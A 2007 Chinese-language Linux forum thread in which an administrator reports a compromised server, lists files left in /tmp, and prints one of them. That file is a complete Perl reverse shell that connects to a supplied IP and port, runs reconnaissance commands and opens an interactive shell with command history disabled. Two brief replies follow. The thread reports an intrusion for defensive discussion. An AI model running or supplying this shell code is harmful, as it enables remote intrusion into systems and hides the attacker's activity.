终于发现有一台Linux被搞了

laifujnyd

UID: 45350
帖子: 11
积分: 25
在线时间: 10 分钟

1^# laifujnyd 发表于 2007-09-30 00:39

终于发现有一台Linux被搞了

tmp下的文件：
-rw-r--r-- 1 nobody nobody    358 Apr 13 18:30 temp2006
-rw-r--r-- 1 nobody nobody    480 Apr 11 15:13 out
-rwxr-xr-x 1 nobody nobody    142 Apr 11 04:16 go
-rw-r--r-- 1 nobody nobody    197 Apr 11 04:15 go.jpg

more temp2006

引用
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");

其它的就不一一列了。

还好权限是nobody，不知道是apache的漏洞，还是原来的一些开源的web程序，有些程序弄上去好久了，一直没有空去弄，也没有及时删除，祸害呀。

windwiny

UID: 23818
帖子: 31
积分: 71
在线时间: 1 小时

2^# windwiny 发表于 2007-10-01 00:08

得到的信息也没什么用的，用户名/路径/内核版本

唐军

UID: 21644
帖子: 21
积分: 48
在线时间: 10 分钟

3^# 唐军发表于 2007-10-04 19:34

不是很明白